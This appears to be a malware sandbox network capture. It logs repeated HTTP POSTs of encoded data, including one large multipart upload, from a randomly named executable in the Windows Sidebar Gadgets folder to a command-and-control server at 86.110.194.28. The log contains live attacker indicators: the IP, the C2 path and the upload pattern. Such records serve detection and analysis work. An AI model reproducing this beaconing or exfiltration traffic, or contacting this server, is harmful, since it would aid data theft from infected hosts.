Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49758 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:40.013098001 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49759 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:40.029356956 CET | 422 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----NZZp5qhoIWq2NhqjOGZR4udlu3EyxDui93
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 188810
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:40.379281998 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 5a 5a 70 35 71 68 6f 49 57 71 32 4e 68 71 6a 4f 47 5a 52 34 75 64 6c 75 33 45 79 78 44 75 69 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                                                                  Data Ascii: ------NZZp5qhoIWq2NhqjOGZR4udlu3EyxDui93Content-Disposition: form-data; name="0"Content-Type: text/plain[P[]]YPPT[YZ[VWR_]ZXRRPA_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZ
Jan 3, 2025 09:07:40.722963095 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:41.100665092 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49760 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:40.167572975 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:07:40.519938946 CET | 2576 | OUT | Data Raw: 5e 50 5b 5a 5d 5d 55 5a 54 5b 59 5a 5b 5e 57 5e 5f 57 5a 5b 52 52 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: ^P[Z]]UZT[YZ[^W^_WZ[RRPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@(.#9#1?$=;*X0$1?6B!Q730?&?<)#Y'$X.
Jan 3, 2025 09:07:40.873821974 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:41.007142067 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49761 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:41.139750957 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Jan 3, 2025 09:07:41.488652945 CET | 2576 | OUT | Data Raw: 5b 50 5e 51 5d 5d 50 5b 54 5b 59 5a 5b 5f 57 58 5f 57 5a 58 52 57 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: [P^Q]]P[T[YZ[_WX_WZXRWPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(!6)<U1,E=(2[0.',! 47873$D$?(#Y'$X.
Jan 3, 2025 09:07:41.846468925 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:41.979756117 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49762 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:42.102443933 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2568
Expect: 100-continue
Jan 3, 2025 09:07:42.457386971 CET | 2568 | OUT | Data Raw: 5b 50 5b 5a 58 5a 55 5f 54 5b 59 5a 5b 57 57 5a 5f 51 5a 5d 52 52 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: [P[ZXZU_T[YZ[WWZ_QZ]RRPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?&!) %$B*8=3B%Z2,%6)4;3$_?3?(#Y'$X.%
Jan 3, 2025 09:07:42.791832924 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:42.922086954 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49763 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:43.057610035 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2568
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:07:43.410531998 CET | 2568 | OUT | Data Raw: 5e 50 5e 5c 58 59 50 5c 54 5b 59 5a 5b 57 57 5c 5f 57 5a 55 52 55 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
Data Ascii: ^P^\XYP\T[YZ[WW\_WZURUPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B)>!59 $,>.^3')&<*!'&44Y0)8'8S))#Y'$X.
Jan 3, 2025 09:07:43.753654003 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:43.881896019 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  23192.168.2.44976486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:44.008955002 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:44.363631964 CET | 2576 | OUT | Data Raw: 5b 51 5e 51 58 5b 50 5c 54 5b 59 5a 5b 54 57 59 5f 53 5a 55 52 50 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q^QX[P\T[YZ[TWY_SZURPPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?>=Z!$U1//>)$B>2,!S $ ++'9438(#Y'$X.-


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  24 | 192.168.2.4 | 49765 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:44.431796074 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:44.785984993 CET | 2164 | OUT | Data Raw: 5e 55 5e 5e 58 57 50 5b 54 5b 59 5a 5b 5e 57 53 5f 51 5a 54 52 51 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U^^XWP[T[YZ[^WS_QZTRQPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+6!:8S2'>]504>&/=Q5'>#8'$#&??#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:45.137269974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:45.270196915 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:45 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 04 32 02 25 05 3d 3f 02 00 27 23 35 5a 22 0e 2c 5c 2f 20 32 40 21 12 0b 11 26 15 0a 55 3c 3d 0f 1c 28 0d 04 0d 21 3d 22 0e 28 0a 28 5d 03 10 39 11 3f 3d 23 58 29 2d 39 5c 2d 27 09 5b 30 09 01 00 3e 0d 21 50 31 05 22 54 22 2e 2c 0e 2a 55 3d 13 33 28 3f 02 2a 20 05 12 33 07 20 54 0b 17 24 0f 26 33 23 5f 32 28 2d 5d 29 0e 38 5d 27 04 00 09 22 05 32 14 37 29 27 06 2c 30 29 1f 24 28 3e 0f 3e 00 3f 10 25 39 2a 5d 26 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '2%=?'#5Z",\/ 2@!&U<=(!="((]9?=#X)-9\-'[0>!P1"T".,*U=3(?* 3 T$&3#_2(-])8]'"27)',0)$(>>?%9*]&+.\#(U4WP


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  25 | 192.168.2.4 | 49766 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:44.553587914 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:44.910571098 CET | 2576 | OUT | Data Raw: 5e 57 5b 5d 5d 5c 50 5d 54 5b 59 5a 5b 50 57 5e 5f 51 5a 59 52 54 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^W[]]\P]T[YZ[PW^_QZYRTPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<-66*8%,@>8"0'&2?)W 4-P (]0*;0+?9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:45.235955000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:45.370091915 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:45 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  26 | 192.168.2.4 | 49767 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:45.573724985 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:45.926117897 CET | 2576 | OUT | Data Raw: 5b 5d 5e 5e 58 5e 55 5a 54 5b 59 5a 5b 56 57 58 5f 50 5a 55 52 54 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^^X^UZT[YZ[VWX_PZURTPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D+"\'1, *(!$B>1>5'5 83'',$V?9#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:46.276850939 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:46.409938097 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:46 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  27 | 192.168.2.4 | 49768 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:46.541990042 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:46.894891977 CET | 2576 | OUT | Data Raw: 5b 56 5e 5c 5d 5c 50 5e 54 5b 59 5a 5b 56 57 5f 5f 57 5a 5d 52 55 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^\]\P^T[YZ[VW__WZ]RUPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E(="&<0C>;%04&)S5'9W (Z%9 D3/W()#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:47.232325077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:47.363889933 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:47 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  28 | 192.168.2.4 | 49769 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:47.491899014 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:47.848056078 CET | 2576 | OUT | Data Raw: 5e 56 5e 5b 5d 5a 50 50 54 5b 59 5a 5b 56 57 5b 5f 53 5a 5f 52 50 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V^[]ZPPT[YZ[VW[_SZ_RPP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?=*"9,%Z8A>>'"&,!!'=T!8[0<B$?V+9#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:48.195022106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:48.328520060 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:48 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  29 | 192.168.2.4 | 49770 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:48.464046955 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:48.816776037 CET | 2576 | OUT | Data Raw: 5b 5d 5b 5a 58 5a 55 5b 54 5b 59 5a 5b 5e 57 5d 5f 54 5a 5e 52 50 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [][ZXZU[T[YZ[^W]_TZ^RPPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@?1\6$<'*(*['5\2<> $Q ^?'+'/ W+9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:49.140012026 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:49.269925117 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:49 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
